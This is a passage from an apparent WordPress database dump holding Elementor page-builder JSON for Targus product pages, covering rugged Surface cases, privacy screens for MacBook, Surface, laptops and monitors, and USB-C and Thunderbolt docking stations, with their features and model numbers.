\\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"398b7f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2b1f7b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b76d24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84599d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02e1d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Non-slip interior for infinite viewing angles<\\/li><li>Integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"56f840c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"829e6ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)<\\/li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6b2856\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33e8d3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d4063c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ef704\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61e6c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da0626d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a354cbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8006a3f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cda527\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"12faef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3eb43c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Screen\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6314953\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78877de\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"468758b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Apple Macbook<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b6689d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1e7d8da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"6e8f169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\\\" alt=\\\"Magnetic Privacy Screen for 13.3\\\" width=\\\"274\\\" height=\\\"274\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61fa17e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7efc979\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Magnetic Privacy Screen for Apple MacBook<\\/strong><\\/h2><ul id=\\\"product-features\\\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes<\\/li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Available\\u00a0 for :-<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>MacBook 12-inch\\u00a0 (ASM12MBGL)<\\/h4><\\/li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)<\\/h4><\\/li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)<\\/h4><\\/li><li><h4>MacBook 15.4-inch (ASM154MBGL)<\\/h4><\\/li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d9f0b2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"08b3411\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"524d5be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e7590b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"975bc53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05e81b1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"83489ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ae0925b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ffd343a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Microsoft Surface<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e15e040\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9454e78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"95d0520\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\\\" alt=\\\"Privacy Screen Microsoft Surface Pro 4 (12.3\\\" width=\\\"215\\\" height=\\\"215\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7666383\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"da26715\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">\\u00a0Microsoft Surface Pro 4 (12.3\\\") - Clear<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for the\\u00a0Microsoft Surface Pro 4 (12.3\\\") tablet<\\/li><li>Works with touch screen<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\\\"https:\\/\\/uk.targus.com\\/pages\\/keep-your-business-your-business\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><u><br \\/><\\/u><\\/a><\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1cbe15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"182a368\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd7176c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48594a0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8dd9cb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ff73127\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99d1e23\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"868d42c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f0f8ace\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Laptop<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"26653f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7b30821\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"53def41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 11.6\\\" width=\\\"307\\\" height=\\\"307\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8342f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"76157d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for tablet, laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 11.6\\\"W 16:9 - (ASF116W9EU)<\\/h4><\\/li><li><h4>Screen 12.1\\\"W 16:10 - (ASF121WEU)<\\/h4><\\/li><li><h4>Screen 12.5\\\"W 16:9 - (ASF125W9EU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W 16:10 - (ASF133WEU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W 16:9 - (ASF133W9EU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:10 - (ASF141WEU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:9 - (ASF141W9EU)<\\/h4><\\/li><li><h4>Screen 14\\u201d W 16:9 - (ASF14W9EU)<\\/h4><\\/li><li><h4>Screen 15.4\\\"W 16:10 - (ASF154WEU)<\\/h4><\\/li><li><h4>Screen 15.6\\\"W 16:9 - (ASF156W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e074c0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b967aae\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d7859f1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bf78a0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e7dda\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dcf0830\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9b6734e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a21cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ccba5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Monitor<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8be1a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a283150\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"485c58c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 17\\\" width=\\\"269\\\" height=\\\"269\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"70e84b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"05a0a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 17\\\"W 4:3 - (ASF170EU)<\\/h4><\\/li><li><h4>Screen 19\\\"W 4:3 - (ASF190EU)<\\/h4><\\/li><li><h4>Screen 19\\\"W 16:10 - (ASF19WEU)<\\/h4><\\/li><li><h4>Screen 21.5\\\"W 16:9 - (ASF215W9EU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:10 - (ASF220WEU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:9 - (ASF22W9EU)<\\/h4><\\/li><li><h4>Screen 23\\\"W 16:9 - (ASF23W9EU)<\\/h4><\\/li><li><h4>Screen 23.8\\\"W 16:9 - (ASF238W9EU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:10 - (ASF24WEU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:9 - (ASF24W9EU)<\\/h4><\\/li><li><h4>Screen 27\\\"W 16:9 - (ASF27W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a1a9a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"058d29d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d3d9795\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8870,3693,'_wp_page_template','template-fullwidth.php'),(8871,3693,'_elementor_edit_mode','builder'),(8872,3693,'_elementor_template_type','wp-page'),(8873,3693,'_elementor_version','2.7.4'),(8874,3693,'_elementor_data','[{\"id\":\"4e01da7\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"20\"},\"elements\":[{\"id\":\"542c5ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.378},\"elements\":[{\"id\":\"bb7c87a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\\\" alt=\\\"safeport rugged ipad case\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24999da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.622},\"elements\":[{\"id\":\"d8d0705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Safeguard Your Valuables<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and other\\u00a0tablet cases\\u00a0- including\\u00a0Field-Ready\\u00a0and\\u00a0Rugged\\u00a0options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e49670\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1304992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"22f0297\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"869e28f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\"},\"elements\":[{\"id\":\"554d7a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.324,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2ddae80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Expand Your Potential<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, we\\u2019re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard\\/mice, and laptop chargers.<\\/p><p>4K docking stations\\u00a0are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. Our\\u00a0dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab11fdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.676},\"elements\":[{\"id\":\"5677e5f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignleft\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\\\" alt=\\\"expand your potential dock quad docking station\\\" width=\\\"519\\\" height=\\\"348\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bfcf376\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6a7498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76d9e25\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bceb31\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6ba22f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"820d50e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Docking Stations\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5abbfc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"b0cb8c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83d2369\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal QUAD HD (QVHD) Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK520USZ)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ec5cce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e58be5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal DV4K Docking Station with 100W Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK190AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"20620af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6c96e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Thunderbolt\\u2122 3 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK220AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2be6e51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"14dc97e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0ea999f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\\\" width=\\\"222\\\" height=\\\"222\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ebdbda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7adb02b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\\\" alt=\\\"USB-C\\u2122 Universal DV4K Docking Station with 100W Power\\\" width=\\\"210\\\" height=\\\"210\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfcd36\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e79c632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/Dock220_grande.jpg?v=1553684715\\\" alt=\\\"Thunderbolt\\u2122 3 DV4K Docking Station with Power\\\" width=\\\"214\\\" height=\\\"214\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"535b089\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c25718e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65bbbfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C 3.0 Port with power (15W non-PD)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f9e3262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abcb033\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPort\\u2122 (DP 1.2a) and 2 HDMI (HDMI 2.0) ports<\\/li><li>Power Delivery up to 100W<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C USB 3.1 Gen 1 device port<\\/li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot<\\/li><li>Power tips included to power Acer\\u00ae, ASUS\\u00ae, Compaq\\u00ae, Dell\\u2122, Fujitsu\\u00ae, Gateway\\u00ae, HP\\u00ae, IBM\\/Lenovo\\u2122, and Toshiba<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e01d2bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0ddb0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>0.5M passive 40G, 5A cable (C\\/M to C\\/M)<\\/li><li>Cable lock slot<\\/li><li>Power Delivery 2.0 up to 85W<\\/li><li>Supports dual-display<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e7b761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1a06dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a805784\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84a363f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"316cffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c570e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1673a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton 